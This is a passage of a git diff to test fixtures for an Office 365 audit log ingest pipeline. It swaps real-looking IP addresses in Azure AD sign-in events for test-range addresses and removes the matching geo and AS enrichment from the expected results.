Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"f67568b1-64c4-4165-bdd9-16a5b9142eef\",\"InterSystemsId\":\"d960e058-1adb-4a84-a65b-1a6ce367e323\",\"IntraSystemId\":\"1dfdb693-18a1-4cff-aa3e-61feaa356100\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:44:03\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"f67568b1-64c4-4165-bdd9-16a5b9142eef\",\"InterSystemsId\":\"d960e058-1adb-4a84-a65b-1a6ce367e323\",\"IntraSystemId\":\"1dfdb693-18a1-4cff-aa3e-61feaa356100\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -4557,10 +4557,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-07T16:44:03", "ExtendedProperties": [ { @@ -4610,7 +4610,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:29:02\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"a8114a24-d342-4689-b75e-51e6386763de\",\"InterSystemsId\":\"e2565aaf-91b0-4ccd-8810-743123eb7383\",\"IntraSystemId\":\"21166e08-6589-4c2d-a325-c97ba45f2200\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:29:02\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"a8114a24-d342-4689-b75e-51e6386763de\",\"InterSystemsId\":\"e2565aaf-91b0-4ccd-8810-743123eb7383\",\"IntraSystemId\":\"21166e08-6589-4c2d-a325-c97ba45f2200\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -4628,10 +4628,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T15:29:02", "ExtendedProperties": [ { @@ -4681,7 +4681,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:25:21\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"1eaf9c65-8c67-4cd9-9277-771589113752\",\"InterSystemsId\":\"ede626b9-2035-4d02-8330-201c4ae82af6\",\"IntraSystemId\":\"98612804-9aa6-40a4-b72a-808bc7742000\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:25:21\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"1eaf9c65-8c67-4cd9-9277-771589113752\",\"InterSystemsId\":\"ede626b9-2035-4d02-8330-201c4ae82af6\",\"IntraSystemId\":\"98612804-9aa6-40a4-b72a-808bc7742000\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -4699,10 +4699,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T15:25:21", "ExtendedProperties": [ { @@ -4752,7 +4752,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:43:39\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"3c439e46-d454-4767-9320-1e75540821b7\",\"InterSystemsId\":\"fc5c6c90-a6ba-486c-b685-8d67c529d3aa\",\"IntraSystemId\":\"6e184f6f-887b-4410-b24d-723031366000\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:39\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"3c439e46-d454-4767-9320-1e75540821b7\",\"InterSystemsId\":\"fc5c6c90-a6ba-486c-b685-8d67c529d3aa\",\"IntraSystemId\":\"6e184f6f-887b-4410-b24d-723031366000\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -4770,10 +4770,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-07T16:43:39", "ExtendedProperties": [ { diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-sts-logon-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-sts-logon-events.json-expected.json index 346c7d2a36e..43ffb7d9847 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-sts-logon-events.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-sts-logon-events.json-expected.json @@ -2,25 +2,7 @@ "expected": [ { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -34,7 +16,7 @@ "ObjectId": "00000002-0000-0000-c000-000000000000", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "False", "ResultStatusDetail": "Success", @@ -84,7 +66,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -96,12 +78,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051465700Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:13:13\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"ca0efc24-1b89-4962-8fef-a3ac5437302f\",\"InterSystemsId\":\"03616b3a-fc75-46a1-b34a-2d82fc8f1e7e\",\"IntraSystemId\":\"c4206c29-46c2-4a6f-a46b-735107705400\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970069Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:13\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"ca0efc24-1b89-4962-8fef-a3ac5437302f\",\"InterSystemsId\":\"03616b3a-fc75-46a1-b34a-2d82fc8f1e7e\",\"IntraSystemId\":\"c4206c29-46c2-4a6f-a46b-735107705400\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -140,25 +122,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "79.159.10.151" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -172,7 +136,7 @@ "ObjectId": "00000003-0000-0000-c000-000000000000", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ExtendedProperties": { "KeepMeSignedIn": "False", "ResultStatusDetail": "Redirect", @@ -222,7 +186,7 @@ "asr" ], "ip": [ - "79.159.10.151" + "67.43.156.13" ] }, "organization": { @@ -234,12 +198,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "79.159.10.151", - "ip": "79.159.10.151" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-17T07:32:46.051480600Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T10:53:24\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"b53de36d-ea71-4ebf-9b71-feb431bd4eba\",\"InterSystemsId\":\"05d69096-cb90-4690-ae69-8acd5177b3e0\",\"IntraSystemId\":\"ed155e11-60b3-4764-b9aa-05c35f3bb800\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970080Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:53:24\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"b53de36d-ea71-4ebf-9b71-feb431bd4eba\",\"InterSystemsId\":\"05d69096-cb90-4690-ae69-8acd5177b3e0\",\"IntraSystemId\":\"ed155e11-60b3-4764-b9aa-05c35f3bb800\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -278,25 +242,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -310,7 +256,7 @@ "ObjectId": "Unknown", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "True", "ResultStatusDetail": "Redirect", @@ -360,7 +306,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -372,12 +318,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051485200Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:29:01\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; 